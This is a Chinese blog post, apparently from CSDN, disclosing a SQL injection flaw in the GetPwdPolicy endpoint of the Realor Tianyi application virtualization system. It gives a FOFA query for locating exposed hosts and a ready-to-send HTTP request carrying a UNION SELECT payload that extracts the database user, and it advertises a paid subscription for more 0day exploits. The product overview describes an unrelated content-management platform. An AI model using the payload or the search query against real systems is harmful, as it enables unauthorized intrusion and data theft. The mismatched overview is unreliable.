首页 > 数据库 >瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞

瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞

时间:2025-01-11 23:29:50浏览次数:3  
标签:2CNULL% 订阅 zh 天翼 GetPwdPolicy 漏洞 瑞友 文章 POC

0x01 阅读须知(免责声明)

        技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!本工具或文章或来源于网络,若有侵权请联系作者删除,自行查验是否具有后门,切勿相信软件内的广告!

0x02 产品概述

       瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞这是一个集内容管理与发布于一体的智能平台,广泛服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。

0x03 漏洞描述

        该漏洞是一种针对Web站点的网络安全隐患,允许攻击者在受影响系统上执行恶意命令,可能造成严重的安全威胁。此类漏洞通常出现在未严格实施强密码策略或未完善接口鉴权机制的系统中,极易被攻击者利用,导致数据泄露、账户信息被盗等问题,甚至进一步危及系统的整体安全性。攻击者可以通过该漏洞窃取敏感信息、篡改数据或破坏系统的正常运行,对用户隐私和业务安全构成重大威胁。因此,建议管理员尽快修复此漏洞,及时下载并安装官方发布的最新补丁包,同时加强接口鉴权机制,实施强密码策略,定期进行安全检查,以有效提升系统的防护能力,防止潜在风险进一步扩大。

fofa

app="REALOR-天翼应用虚拟化系统"

0x04 POC利用

GET /RAPAgent.XGI?CMD=GetPwdPolicy&User=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7e%2C%28SELECT+user()%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive

 0x05 需要0day漏洞欢迎订阅我们 (订阅专属0day)

漏洞获取:点击这里ZeroDay漏洞库获取改漏洞POC

备用地址:点击即可获取完整漏洞POC

如果你想获取更多0day1day漏洞欢迎订阅我们CSDN付费专栏,一次订阅即可享受后续文章的全部更新,打码截图POC都在付费专栏里面,前100名仅需19.9元早订阅早享受享折扣(每周一至周五更新1day/0day漏洞)

订阅专栏后即可解锁全部文章POC,并且享受后续1day0day漏洞POC的更新

每个文章都有详细且完整的WriteUP(例如如下图所示:)

使用技巧:点击链接扫描订阅后快速搜索想要的文章

备用地址:点击即可获取完整漏洞POC

标签:2CNULL%,订阅,zh,天翼,GetPwdPolicy,漏洞,瑞友,文章,POC
From: https://blog.csdn.net/ZeroDay001/article/details/145041019

相关文章

  • 第一!天翼云全面领跑智算云服务市场
    近日,赛迪顾问发布《2024H1中国智算云服务市场研究报告》。报告显示,天翼云位居2024H1中国智算云服务市场领导者象限,并荣膺2024H1中国算力互联调度市场第一名,彰显了天翼云在智算领域的核心竞争力和行业领导者地位。2024H1中国智算云服务市场厂商竞争力象限分析图2024H1中国算力......
  • 国际认可!天翼云合规领域影响力up!
    近日,天翼云科技有限公司成功通过ISO37301合规管理体系双认证(GB/T35770-2022/ISO37301:2021&CTSGHMS001-2024),标志着公司合规管理和风险控制的管理水平达到国际领先标准,合规体系建设迈上了新台阶。ISO37301:2021全称为《合规管理体系 要求及使用指南》,由ISO/TC309技术委......
  • 中国四大云计算平台:阿里云、腾讯云、金山云与天翼云的技术对决与市场洞察
    引言随着全球数字化转型的加速,云计算作为数字经济的基础设施正成为各行业发展的重要驱动力。本文旨在为企业决策者、技术开发者以及对云计算感兴趣的普通用户提供关于中国四大云计算平台的深度分析。中国市场中,阿里云、腾讯云、金山云和天翼云四大平台占据着重要位置,各自发挥......
  • 云行 | “智”绘首都发展新篇章,天翼云携手伙伴共创“京”彩未来!
    12月12日,以“智耀京华焕新领航”为主题的天翼云中国行·北京站活动圆满落幕。北京市经济和信息化局副局长刘维亮,中国电信股份有限公司北京分公司总经理寇凤达,天翼云科技有限公司助理总经理宫梅霞,中国信息通信研究院云计算与大数据研究所所长何宝宏等领导以及客户、合作伙伴代表等......
  • 首批!天翼云率先通过ITU国际标准认证!
    近日,天翼云通过国内唯一人工智能云平台领域的ITU国际标准评估——中国信通院组织的ITU-TF.AICP-GA人工智能云平台技术规范国际标准和《智算工程平台能力要求》国内标准一致性评估,并成为国内首批通过该标准的公司。  该测评涵盖管理运维服务、数据工程服务、模型开发训练服......
  • 智启云端 算绘蓝图!天翼云斩获多项殊荣!
    近日,由全球数字经济大会组委会主办,中国信息通信研究院(以下简称“中国信通院”)、中国通信企业协会承办的2024全球数字经济大会云·AI·计算国际合作论坛在京召开。大会以“智启云端,算绘蓝图”为主题,北京市经济和信息化局领导、北京市通信管理局领导、中国信通院领导、中国工程院院......
  • 让AI碰撞!“天翼云息壤杯”高校AI大赛江苏赛区交流会热力开场!
    由中国电信集团有限公司主办,天翼云科技有限公司承办的“天翼云息壤杯”高校AI大赛正在火热进行中。为了提高江苏赛区学生的参赛热情,增强学生的创作能力,江苏电信、天翼云华东中心于12月6日在南京联合举办了主题为“共筑教育新生态,息壤智汇新征程”的AI大赛交流分享会。此次交流分......
  • 天翼云全栈混合云应用场景
    本文分享自天翼云开发者社区《天翼云全栈混合云应用场景》,作者:华****天天翼云全栈混合云应用场景应用场景一:统一门户、统一管理、统一安全的混合云1.独享服务体验。面向政府、企业等行业大客户场景,提供独享的云服务使用体验。将原本供天翼公有云使用的服务属地化部署在客户就近......
  • 天翼云与百川智能达成战略合作,共同推进模型行业创新应用!
    11月19日,天翼云科技有限公司与北京百川智能科技有限公司战略合作签约仪式顺利举行。后续双方将秉承诚信互用原则,充分发挥各自优势,在产品、技术、平台、生态等多个方面展开深度合作,更好地赋能千行百业数字化转型。天翼云助理总经理宫梅霞和百川智能联合创始人茹立云代表双方签约。......
  • “天翼云息壤杯”高校AI大赛云南赛区启动!
    11月19日,首届全国“天翼云息壤杯”高校AI大赛云南赛区启动仪式在昆明理工大学举行。本次赛事由中国电信云南公司(以下简称“云南电信”)和云南省计算机学会智能计算专业委员会联合主办,天翼云科技有限公司承办,旨在激发高校学生在人工智能领域的创新潜能,推动该技术在教育、科研等领域......